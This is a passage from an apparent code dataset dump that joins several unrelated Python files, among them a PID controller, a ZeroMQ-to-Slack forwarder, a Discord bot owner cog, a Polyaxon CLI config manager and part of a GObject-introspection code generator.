def is_module_image_installed():
try:
from PIL import Image
from PIL import ImageFile
except ImportError:
try:
import Image
import ImageFile
except ImportError:
return False
return True
class LazyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Promise):
return force_text(obj)
return super(LazyEncoder, self).default(obj)
def json_dumps(data):
return json.dumps(data, cls=LazyEncoder)
| 2.21875 | 2 |
timedpid.py | DrGFreeman/PyTools | 1 | 3412 | # timedpid.py
# Source: https://github.com/DrGFreeman/PyTools
#
# MIT License
#
# Copyright (c) 2017 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This module defines a simple Proportional - Integral - Derivative (PID)
# controller with different time step calculation methods. This is a python
# implementation of my Arduino TimedPID library which can be found at
# https://github.com/DrGFreeman/TimedPID. Refer to this repository for detailed
# documentation.
import time
class TimedPID:
# Constructor
def __init__(self, kp = 1., ki = 0., kd = 0.):
self._kp = kp
self._ki = ki
self._kd = kd
self._cmdMin = None
self._cmdMax = None
self._boundRange = False
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
def getCmd(self, setPoint, procVar):
"""Gets the PID command without time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled.
No time step is used (assumed = 1)."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += error
errorDerivative = error - self._errorPrevious
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def getCmdAutoStep(self, setPoint, procVar):
"""Gets the PID command with automatic time step calculation.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
The time step is calculated as the time since the last call to the
method."""
# Calculate time step
currentTime = time.time()
timeStep = currentTime - self._lastCmdTime
# Set last time method was called to current time
self._lastCmdTime = currentTime
# Get command
return self.getCmdStep(setPoint, procVar, timeStep)
def getCmdStep(self, setPoint, procVar, timeStep):
"""Gets the PID command with a specified time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
timeStep is the time step."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += (error + self._errorPrevious) / 2 * timeStep
errorDerivative = (error - self._errorPrevious) / timeStep
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def setCmdRange(self, cmdMin, cmdMax):
"""Sets the maximum command range. Commands calculated outside the
cmdMin and cmdMax will be set to cmdMin or cmdMax respectively."""
self._cmdMin = cmdMin
self._cmdMax = cmdMax
self._boundRange = True
def setGains(self, kp = 1., ki = 0., kd = 0.):
"""Sets the proportional, integral and derivative terms."""
self._kp = kp
self._ki = ki
self._kd = kd
def reset(self):
"""Resets the PID error terms and timer."""
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
# Private methods
def _boundCmd(self, cmd):
"""Bounds the command within the range _cmdMin to _cmdMax."""
if self._boundRange:
if cmd < self._cmdMin:
cmd = self._cmdMin
elif cmd > self._cmdMax:
cmd = self._cmdMax
return cmd
| 2.078125 | 2 |
pmon/zmq_responder.py | bernd-clemenz/pmon | 1 | 3413 | #
# -*- coding: utf-8-*-
# receives messages via zmq and executes some simple
# operations.
#
# (c) ISC Clemenz & Weinbrecht GmbH 2018
#
import json
import requests
import zmq
import pmon
class ZmqResponder(object):
context = None
socket = None
def __init__(self):
"""
Constructor.
"""
self.cfg = pmon.CFG
self.log = pmon.LOG
def __enter__(self):
self.bind()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def bind(self):
self.log.info("Binding ZMQ")
port = self.cfg['pmon']['zmq.port']
bind_str = "tcp://*:{0}".format(port)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
self.socket.bind(bind_str)
def done(self):
self.log.info("Disconnecting ZMQ")
if self.socket is not None:
self.socket.close()
if self.context is not None:
self.context.term()
def _read_message(self):
self.log.debug("Wait for incoming message")
msg = self.socket.recv()
_msg = msg.decode('utf-8')
return json.loads(_msg)
@staticmethod
def _make_slack_payload(message):
slack_payload = dict()
slack_payload['text'] = message['msg']
attachments = list()
slack_payload['attachments'] = attachments
attachment = dict()
attachment["fallback"] = message['msg']
attachment['text'] = message['msg']
attachment['title'] = message['msg.type']
attachment['author_name'] = message['from']
attachments.append(attachment)
return slack_payload
def _report_message_to_slack(self, message):
"""
Send a message to Slack Web-Hook.
:param message: the message record to be send to slack
:return: None
"""
self.log.debug("Forwarding message to slack")
url = self.cfg['pmon']['slack.hook']
payload = json.dumps(self._make_slack_payload(message))
headers = {'Accept': 'application/json',
'Content-Type': 'application/json',
'Content-Encoding': 'utf8',
'Content-Length': str(len(payload))}
try:
rsp = requests.post(url, data=payload, headers=headers)
if rsp.status_code != requests.codes.ok:
self.log.warn("problem sending to slack: {0}".format(rsp.status_code))
except Exception as x:
self.log.error(str(x))
def respond(self):
go_on = True
while go_on:
message = self._read_message()
self.log.debug("Message: {0}, {1}".format(message['msg.type'],
message['msg']))
self.socket.send_string('ACK')
try:
self._report_message_to_slack(message)
except Exception as x:
self.log.error(str(x))
go_on = True if message['msg'] != 'stop' else False
| 2.453125 | 2 |
test/test_substitute.py | sanskrit/padmini | 1 | 3414 | <filename>test/test_substitute.py
from padmini import operations as op
def test_yatha():
before = ("tAs", "Tas", "Ta", "mip")
after = ("tAm", "tam", "ta", "am")
for i, b in enumerate(before):
assert op.yatha(b, before, after) == after[i]
"""
def test_ti():
assert S.ti("ta", "e") == "te"
assert S.ti("AtAm", "e") == "Ate"
def test_antya():
assert S.antya("ti", "u") == "tu"
assert S.antya("te", "Am") == "tAm"
"""
| 3.0625 | 3 |
TVSaffiliations/extractemails_nogui.py | kmhambleton/LSST-TVSSC.github.io | 0 | 3415 | # coding: utf-8
#just prints the emails of members of a group to stdout,
#both primary and secondary members
# run as
# $python extractemails_nogui.py "Tidal Disruption Events"
from __future__ import print_function
'__author__' == '<NAME>, NYU - GitHub: fedhere'
import sys
import pandas as pd
from argparse import ArgumentParser
from config import tvsfile
def parse_args(subglist):
""" Use ArgParser to build up the arguments we will use in our script
"""
stored_args = {}
# get the script name without the extension & use it to build up
# the json filename
parser = ArgumentParser(description='Selecting members by subgroup')
parser.add_argument('subgroup',
action='store',
default=None,
help='Choose the subgroup affiliation:' +
' -- '.join([s for s in subglist]))
args = parser.parse_args()
return args
if __name__ == '__main__':
if tvsfile is None:
print ("Required Argument: Google Doc file identifier (if you do not have it email federica!)")
sys.exit()
TVSMembers = pd.read_csv('https://docs.google.com/spreadsheets/d/' +
tvsfile +
'/export?gid=0&format=csv',
index_col=0)
subgroups = TVSMembers.primary.unique()
conf = parse_args([x for x in subgroups if str(x) != 'nan'])
primary = conf.subgroup
secondary = conf.subgroup
emails = TVSMembers[TVSMembers.primary == primary]['email'].values
print ("These are the members with primary affiliation with " + primary)
print ("")
print (' '.join([em + ','for em in emails]))
emails = TVSMembers[(TVSMembers.secondary == secondary) | (TVSMembers['secondary.1'] == secondary) | (TVSMembers['secondary.2'] == secondary)]['email'].values
print ("\n")
print ("These are the members with secondary affiliation with " + secondary)
print ("")
print (' '.join([em + ','for em in emails]))
print ("")
print ("If you also want their names and affiliations use: ")
print ("$python extractemailsW.py " + conf.subgroup)
| 3.0625 | 3 |
cogs/owner.py | Obsidian-Development/JDBot | 0 | 3416 | <reponame>Obsidian-Development/JDBot<filename>cogs/owner.py
from discord.ext import commands, menus
import utils
import random , discord, os, importlib, mystbin, typing, aioimgur, functools, tweepy
import traceback, textwrap
from discord.ext.menus.views import ViewMenuPages
class Owner(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(brief="a command to send mail")
async def mail(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.reply("User not found, returning Letter")
user = ctx.author
if user:
await ctx.reply("Please give me a message to use.")
message = await self.bot.wait_for("message",check = utils.check(ctx))
embed_message = discord.Embed(title=message.content, timestamp=(message.created_at), color=random.randint(0, 16777215))
embed_message.set_author(name=f"Mail from: {ctx.author}",icon_url=(ctx.author.display_avatar.url))
embed_message.set_footer(text = f"{ctx.author.id}")
embed_message.set_thumbnail(url = "https://i.imgur.com/1XvDnqC.png")
if (user.dm_channel is None):
await user.create_dm()
try:
await user.send(embed=embed_message)
except:
user = ctx.author
await user.send(content="Message failed. sending",embed=embed_message)
embed_message.add_field(name="Sent To:",value=str(user))
await self.bot.get_channel(855217084710912050).send(embed=embed_message)
@commands.command()
async def load(self, ctx, *, cog = None):
if cog:
try:
self.bot.load_extension(cog)
except Exception as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Loaded cog(see if there's any errors)")
if cog is None:
await ctx.send("you can't ask to load no cogs.")
@commands.command()
async def reload(self, ctx, *, cog = None):
cog = cog or "all"
if cog == "all":
for x in list(self.bot.extensions):
try:
self.bot.reload_extension(x)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("done reloading all cogs(check for any errors)")
else:
try:
self.bot.reload_extension(cog)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Cog reloaded :D (check for any errors)")
@commands.command()
async def unload(self, ctx, *, cog = None):
if cog:
try:
self.bot.unload_extension(cog)
except commands.errors.ExtensionError as e:
await ctx.send(e)
traceback.print_exc()
await ctx.send("Cog should be unloaded just fine :D.(check any errors)")
if cog is None:
await ctx.send("you can't ask to reload no cogs")
@commands.command()
async def shutdown(self, ctx):
await ctx.send("shutdown/logout time happening.")
await self.bot.close()
async def cog_check(self, ctx):
return await self.bot.is_owner(ctx.author)
async def cog_command_error(self, ctx, error):
if ctx.command or not ctx.command.has_error_handler():
await ctx.send(error)
traceback.print_exc()
#I need to fix all cog_command_error
@commands.command(brief="Changes Bot Status(Owner Only)")
async def status(self , ctx , * , args=None):
if await self.bot.is_owner(ctx.author):
if args:
await self.bot.change_presence(status=discord.Status.do_not_disturb, activity= discord.Activity(type=discord.ActivityType.watching,name=args))
if args is None:
await self.bot.change_presence(status=discord.Status.do_not_disturb)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("That's an owner only command")
@commands.command(brief="Only owner command to change bot's nickname")
async def change_nick(self, ctx ,*, name=None):
if await self.bot.is_owner(ctx.author):
if isinstance(ctx.channel, discord.TextChannel):
await ctx.send("Changing Nickname")
try:
await ctx.guild.me.edit(nick=name)
except discord.Forbidden:
await ctx.send("Appears not to have valid perms")
if isinstance(ctx.channel,discord.DMChannel):
await ctx.send("You can't use that in Dms.")
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that command")
class ServersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed = discord.Embed(title="Servers:",description=item,color=random.randint(0, 16777215))
return embed
@commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only)")
async def servers(self, ctx):
if await self.bot.is_owner(ctx.author):
pag = commands.Paginator()
for g in self.bot.guilds:
pag.add_line(f"[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}")
pages = [page.strip("`") for page in pag.pages]
menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that it's owner only")
@commands.command(brief="only works with JDJG, but this command is meant to send updates to my webhook")
async def webhook_update(self, ctx, *, args = None):
if await self.bot.is_owner(ctx.author):
if args:
if isinstance(ctx.channel, discord.TextChannel):
try:
await ctx.message.delete()
except:
await ctx.send("It couldn't delete the message in this guils so, I kept it here.")
webhook = discord.Webhook.from_url(os.environ["webhook1"], session = self.bot.session)
embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at))
embed.add_field(name="Update Info:",value=args)
embed.set_author(name="<NAME>",icon_url='https://i.imgur.com/pdQkCBv.png')
embed.set_footer(text="JDJG's Updates")
await webhook.send(embed=embed)
webhook=discord.Webhook.from_url(os.environ["webhook99"], session = self.bot.session)
embed=discord.Embed(title="Update",color=(35056),timestamp=(ctx.message.created_at))
embed.add_field(name="Update Info:",value=args)
embed.set_author(name="<NAME>",icon_url='https://i.imgur.com/pdQkCBv.png')
embed.set_footer(text="JDJG's Updates")
await webhook.send(embed=embed)
if args is None:
await ctx.send("You sadly can't use it like that.")
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that")
@commands.command(brief="Commands to see what guilds a person is in.")
async def mutualguilds(self, ctx, *, user: utils.BetterUserconverter = None):
user = user or ctx.author
pag = commands.Paginator()
for g in user.mutual_guilds:
pag.add_line(f"{g}")
pages = [page.strip("`") for page in pag.pages]
pages = pages or ["No shared servers"]
menu = ViewMenuPages(utils.mutualGuildsEmbed(pages, per_page=1),delete_message_after = True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
@commands.command(brief="A command to add sus_users with a reason")
async def addsus(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("can't have a user be none.")
if user:
await ctx.reply("Please give me a reason why:")
reason = await self.bot.wait_for("message",check= utils.check(ctx))
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO sus_users VALUES (?, ?)", (user.id, reason.content))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send("added sus users, succesfully")
@commands.command(brief="a command to remove sus users.")
async def removesus(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a none user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM sus_users WHERE user_id = ?", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send("Removed sus users.")
class SusUsersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed=discord.Embed(title = "Users Deemed Suspicious by JDJG Inc. Official", color = random.randint(0, 16777215))
embed.add_field(name = f"User ID : {item[0]}", value = f"**Reason :** {item[1]}", inline = False)
return embed
@commands.command(brief="a command to grab all in the sus_users list")
async def sus_users(self, ctx):
cur = await self.bot.sus_users.cursor()
cursor = await cur.execute("SELECT * FROM SUS_USERS;")
sus_users = tuple(await cursor.fetchall())
await cur.close()
await self.bot.sus_users.commit()
menu = ViewMenuPages(self.SusUsersEmbed(sus_users, per_page=1),delete_message_after=True)
await menu.start(ctx)
@sus_users.error
async def sus_users_error(self, ctx, error):
await ctx.send(error)
class TestersEmbed(menus.ListPageSource):
async def format_page(self, menu, item):
embed = discord.Embed(title = "Testing Users:", color = random.randint(0, 16777215))
embed.add_field(name = "User ID:", value = f"{item}", inline = False)
return embed
@commands.command(brief = "a command listed all the commands")
async def testers(self, ctx):
menu = ViewMenuPages(self.TestersEmbed(self.bot.testers, per_page = 1), delete_message_after = True)
await menu.start(ctx)
@commands.command()
async def update_sus(self, ctx):
await self.bot.sus_users.commit()
await ctx.send("Updated SQL boss.")
@update_sus.error
async def update_sus_error(self, ctx, error):
await ctx.send(error)
@commands.command(aliases=["bypass_command"])
async def command_bypass(self, ctx ,user: utils.BetterUserconverter = None, *, command = None):
#make sure to swap to autoconverter if it gets added.
user = user or ctx.author
if command:
command_wanted=self.bot.get_command(command)
if command_wanted:
await ctx.send(f"{command_wanted.name} now accessible for the {user} for one command usage!")
self.bot.special_access[user.id]=command_wanted.name
if command_wanted is None:
await ctx.send("Please specify a valid command.")
if command is None:
await ctx.send("select a command :(")
@commands.command(brief = "resets cooldown for you.",aliases = ["reset_cooldown"])
async def resetcooldown(self, ctx, *, command = None):
if not command:
return await ctx.send("please specificy a command")
command_wanted = self.bot.get_command(command)
if not command_wanted:
return await ctx.send("please specify a command")
if not command_wanted.is_on_cooldown(ctx):
return await ctx.send("That doesn't have a cooldown/isn't on a cooldown.")
command_wanted.reset_cooldown(ctx)
await ctx.send(f"reset cooldown of {command_wanted}")
@commands.command(brief = "leaves a guild only use when needed or really wanted. Otherwise no thanks.")
async def leave_guild(self, ctx, *, guild: typing.Optional[discord.Guild] = None):
guild = guild or ctx.guild
if guild is None: return await ctx.send("Guild is None can't do anything.")
await ctx.send("Bot leaving guild :(")
try:
await guild.leave()
except Exception as e:
await ctx.send(f"Somehow an error occured: {e}")
traceback.print_exc()
@commands.command()
async def aioinput_test(self, ctx, *, args = None):
args = args or "Test"
result=await self.bot.loop.run_in_executor(None, input, (f"{args}:"))
await ctx.send(f"Result of the input was {result}")
@commands.command(brief="a powerful owner tool to reload local files that aren't reloadable.")
async def reload_basic(self, ctx, *, args = None):
if args is None:await ctx.send("Can't reload module named None")
if args:
try: module = importlib.import_module(name=args)
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
try: value=importlib.reload(module)
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
await ctx.send(f"Sucessfully reloaded {value.__name__} \nMain Package: {value.__package__}")
@commands.command(brief="backs up a channel and then sends it into a file or mystbin")
async def channel_backup(self, ctx):
messages = await ctx.channel.history(limit = None, oldest_first = True).flatten()
new_line = "\n"
page = "\n".join(f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {msg.content} {new_line}Attachments : {msg.attachments}" if msg.content else f"{msg.author} ({('Bot' if msg.author.bot else 'User')}) : {new_line.join(f'{e.to_dict()}' for e in msg.embeds)} {new_line}Attachments : {msg.attachments}" for msg in messages)
mystbin_client = mystbin.Client(session = self.bot.session)
paste = await mystbin_client.post(page)
await ctx.author.send(content=f"Added text file to mystbin: \n{paste.url}")
@channel_backup.error
async def channel_backup_error(self, ctx, error):
etype = type(error)
trace = error.__traceback__
values=''.join(map(str,traceback.format_exception(etype, error, trace)))
pages = textwrap.wrap(values, width = 1992)
menu = ViewMenuPages(utils.ErrorEmbed(pages, per_page = 1),delete_message_after = True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
mystbin_client = mystbin.Client(session=self.bot.session)
paste = await mystbin_client.post(values)
await ctx.send(f"Traceback: {paste.url}")
@commands.command(brief = "adds packages and urls to rtfm DB", aliases=["add_rtfm"])
async def addrtfm(self, ctx, name = None, *, url = None):
if not name or not url or not name and not url:
return await ctx.send("You need a name and also url.")
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO RTFM_DICTIONARY VALUES (?, ?)", (name, url))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send(f"added {name} and {url} to the rtfm DB")
@commands.command(brief = "removes packages from the rtfm DB", aliases = ["remove_rtfm"])
async def removertfm(self, ctx, *, name = None):
if name is None:
return await ctx.send("You can't remove None")
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM RTFM_DICTIONARY WHERE name = ?", (name,))
await self.bot.sus_users.commit()
await cur.close()
await ctx.send(f"Removed the rfm value {name}.")
@commands.command(brief = "a command to save images to imgur(for owner only lol)")
async def save_image(self, ctx):
if not ctx.message.attachments:
return await ctx.send("You need to provide some attachments.")
await ctx.send("JDJG doesn't take any responbility for what you upload here :eyes: don't upload anything bad okay?")
for x in ctx.message.attachments:
try:
discord.utils._get_mime_type_for_image(await x.read())
except Exception as e:
traceback.print_exc()
return await ctx.send(e)
imgur_client= aioimgur.ImgurClient(os.environ["imgur_id"], os.environ["imgur_secret"])
imgur_url = await imgur_client.upload(await x.read())
await ctx.send(f"{imgur_url['link']}")
@commands.command(brief="A command to remove testers")
async def remove_tester(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a non existent user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("DELETE FROM testers_list WHERE user_id = ?", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
if not user.id in self.bot.testers:
return await ctx.send(f"{user} isn't in the testers list.")
else:
self.bot.testers.remove(user.id)
await ctx.send(f"Removed tester known as {user}")
@commands.command(brief="A command to add testers")
async def add_tester(self, ctx, *, user: utils.BetterUserconverter = None):
if user is None:
await ctx.send("You can't have a non existent user.")
if user:
cur = await self.bot.sus_users.cursor()
await cur.execute("INSERT INTO testers_list VALUES (?)", (user.id,))
await self.bot.sus_users.commit()
await cur.close()
if not user.id in self.bot.testers:
self.bot.testers.append(user.id)
await ctx.send(f"added tester known as {user}")
else:
return await ctx.send(f"{user} is in the testers list already!")
def tweepy_post(self, post_text = None):
consumer_key = os.getenv('tweet_key')
consumer_secret = os.getenv('tweet_secret')
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
access_token = os.getenv('tweet_access')
access_secret = os.getenv('tweet_token')
auth.set_access_token(access_token, access_secret)
twitter_api = tweepy.API(auth)
return twitter_api.update_status(status = post_text)
@commands.command(brief = "sends tweet to JDBot Twitter")
async def send_tweet(self, ctx, *, args = None):
if not args:
return await ctx.send("you can't send nothing to twitter.")
try:
tweet_time = functools.partial(self.tweepy_post, args)
post = await self.bot.loop.run_in_executor(None, tweet_time)
except Exception as e:
traceback.print_exc()
return await ctx.send(f"Exception occured at {e}")
await ctx.send(f"Url of sent tweet is: https://twitter.com/twitter/statuses/{post.id}")
@commands.command(brief = "chunks a guild for the purpose of testing purpose(it's owner only to be used in testing guilds only)")
async def chunk_guild(self, ctx):
if ctx.guild is None:
return await ctx.send("You can't chunk a guild that doesn't exist or a channel that is a DM.")
if ctx.guild.chunked:
return await ctx.send("No need to chunk this guild, it appears to be chunked")
await ctx.guild.chunk(cache = True)
await ctx.send("Finished chunking..")
@chunk_guild.error
async def chunk_guild_error(self, ctx, error):
await ctx.send(error)
traceback.print_exc()
@commands.command(brief = "displays the guild status and user status immediately")
async def stats_status(self, ctx):
await ctx.send("changing status, check now....")
await self.bot.change_presence(status=discord.Status.online, activity=discord.Activity(type=discord.ActivityType.watching, name=f"{len(self.bot.guilds)} servers | {len(self.bot.users)} users"))
@stats_status.error
async def stats_status_error(self, ctx, error):
await ctx.send(error)
@commands.command(brief="a command to give a list of servers(owner only)",help="Gives a list of guilds(Bot Owners only) but with join dates updated.")
async def servers2(self, ctx):
if await self.bot.is_owner(ctx.author):
sorted_guilds = sorted(self.bot.guilds, key=lambda guild: guild.me.joined_at)
pag = commands.Paginator()
for g in sorted_guilds:
pag.add_line(f"{discord.utils.format_dt(g.me.joined_at, style = 'd')} {discord.utils.format_dt(g.me.joined_at, style = 'T')} \n[{len(g.members)}/{g.member_count}] **{g.name}** (`{g.id}`) | {(g.system_channel or g.text_channels[0]).mention}\n")
pages = [page.strip("`") for page in pag.pages]
menu = ViewMenuPages(self.ServersEmbed(pages, per_page=1),delete_message_after=True)
if (ctx.author.dm_channel is None):
await ctx.author.create_dm()
await menu.start(ctx, channel = ctx.author.dm_channel)
if await self.bot.is_owner(ctx.author) is False:
await ctx.send("You can't use that it's owner only")
def setup(bot):
bot.add_cog(Owner(bot))
| 2.234375 | 2 |
tests/input_files/full_sm_UFO/function_library.py | valassi/mg5amc_test | 1 | 3417 | <gh_stars>1-10
# This file is part of the UFO.
#
# This file contains definitions for functions that
# are extensions of the cmath library, and correspond
# either to functions that are in cmath, but inconvenient
# to access from there (e.g. z.conjugate()),
# or functions that are simply not defined.
#
#
from __future__ import absolute_import
__date__ = "22 July 2010"
__author__ = "<EMAIL>"
import cmath
from .object_library import all_functions, Function
#
# shortcuts for functions from cmath
#
complexconjugate = Function(name = 'complexconjugate',
arguments = ('z',),
expression = 'z.conjugate()')
re = Function(name = 're',
arguments = ('z',),
expression = 'z.real')
im = Function(name = 'im',
arguments = ('z',),
expression = 'z.imag')
# New functions (trigonometric)
sec = Function(name = 'sec',
arguments = ('z',),
expression = '1./cmath.cos(z)')
asec = Function(name = 'asec',
arguments = ('z',),
expression = 'cmath.acos(1./z)')
csc = Function(name = 'csc',
arguments = ('z',),
expression = '1./cmath.sin(z)')
acsc = Function(name = 'acsc',
arguments = ('z',),
expression = 'cmath.asin(1./z)')
| 2.21875 | 2 |
cli/polyaxon/managers/cli.py | hackerwins/polyaxon | 0 | 3418 | <gh_stars>0
#!/usr/bin/python
#
# Copyright 2019 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
from __future__ import absolute_import, division, print_function
from distutils.version import LooseVersion # pylint:disable=import-error
from polyaxon.managers.base import BaseConfigManager
from polyaxon.schemas.cli.cli_configuration import CliConfigurationConfig
class CliConfigManager(BaseConfigManager):
"""Manages access cli configuration .polyaxoncli file."""
IS_GLOBAL = True
CONFIG_FILE_NAME = ".polyaxoncli"
CONFIG = CliConfigurationConfig
FREQUENCY = 3
@classmethod
def _get_count(cls):
config = cls.get_config_or_default()
return config.check_count + 1
@classmethod
def reset(
cls,
check_count=None,
current_version=None,
server_versions=None,
log_handler=None,
):
if not any([check_count, current_version, server_versions, log_handler]):
return
cli_config = cls.get_config_or_default()
if check_count is not None:
cli_config.check_count = check_count
if current_version is not None:
cli_config.current_version = current_version
if server_versions is not None:
cli_config.server_versions = server_versions
if log_handler is not None:
cli_config.log_handler = log_handler
CliConfigManager.set_config(config=cli_config)
return cli_config
@classmethod
def should_check(cls):
count = cls._get_count()
cls.reset(check_count=count)
if count > cls.FREQUENCY:
return True
config = cls.get_config_or_default()
if config.current_version is None or config.min_version is None:
return True
return LooseVersion(config.current_version) < LooseVersion(config.min_version)
| 1.742188 | 2 |
duckql/properties/tests/test_null.py | fossabot/duckql-python | 4 | 3419 | import pytest
from duckql.properties import Null
@pytest.fixture(scope="module")
def valid_instance() -> Null:
return Null()
def test_string(valid_instance: Null):
assert str(valid_instance) == 'NULL'
def test_obj(valid_instance: Null):
assert valid_instance.obj == 'properties.Null'
def test_json_parse(valid_instance: Null):
assert valid_instance.json() == '{"obj": "properties.Null"}'
| 2.484375 | 2 |
openbmc/build/tmp/deploy/sdk/witherspoon-2019-08-08/sysroots/armv6-openbmc-linux-gnueabi/usr/lib/gobject-introspection/giscanner/codegen.py | sotaoverride/backup | 0 | 3420 | <gh_stars>0
# -*- Mode: Python -*-
# GObject-Introspection - a framework for introspecting GObject libraries
# Copyright (C) 2010 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
#
import os
from contextlib import contextmanager
from . import ast
class CCodeGenerator(object):
def __init__(self, namespace,
out_h_filename,
out_c_filename,
function_decoration=[],
include_first_header=[],
include_last_header=[],
include_first_src=[],
include_last_src=[]):
self.out_h_filename = out_h_filename
self.out_c_filename = out_c_filename
self.function_decoration = function_decoration
self.include_first_header = include_first_header
self.include_last_header = include_last_header
self.include_first_src = include_first_src
self.include_last_src = include_last_src
self._function_bodies = {}
self.namespace = namespace
def gen_symbol(self, name):
name = name.replace(' ', '_')
return '%s_%s' % (self.namespace.symbol_prefixes[0], name)
def _typecontainer_to_ctype(self, param):
if (isinstance(param, ast.Parameter)
and param.direction in (ast.PARAM_DIRECTION_OUT, ast.PARAM_DIRECTION_INOUT)):
suffix = '*'
else:
suffix = ''
if (param.type.is_equiv((ast.TYPE_STRING, ast.TYPE_FILENAME))
and param.transfer == ast.PARAM_TRANSFER_NONE):
return "const gchar*" + suffix
return param.type.ctype + suffix
def _write_prelude(self, out, func):
if self.function_decoration:
out.write("""
%s""" % " ".join(self.function_decoration))
out.write("""
%s
%s (""" % (self._typecontainer_to_ctype(func.retval), func.symbol))
l = len(func.parameters)
if func.parameters:
for i, param in enumerate(func.parameters):
ctype = self._typecontainer_to_ctype(param)
out.write('%s %s' % (ctype, param.argname))
if i < l - 1:
out.write(", ")
else:
out.write('void')
out.write(")")
def _write_prototype(self, func):
self._write_prelude(self.out_h, func)
self.out_h.write(";\n\n")
def _write_annotation_transfer(self, node):
if (node.type not in ast.BASIC_TYPES or
node.type.ctype.endswith('*')):
self.out_c.write(" (transfer %s)" % (node.transfer, ))
def _write_docs(self, func):
self.out_c.write("/**\n * %s:\n" % (func.symbol, ))
for param in func.parameters:
self.out_c.write(" * @%s" % (param.argname, ))
if param.direction in (ast.PARAM_DIRECTION_OUT,
ast.PARAM_DIRECTION_INOUT):
if param.caller_allocates:
allocate_string = ' caller-allocates'
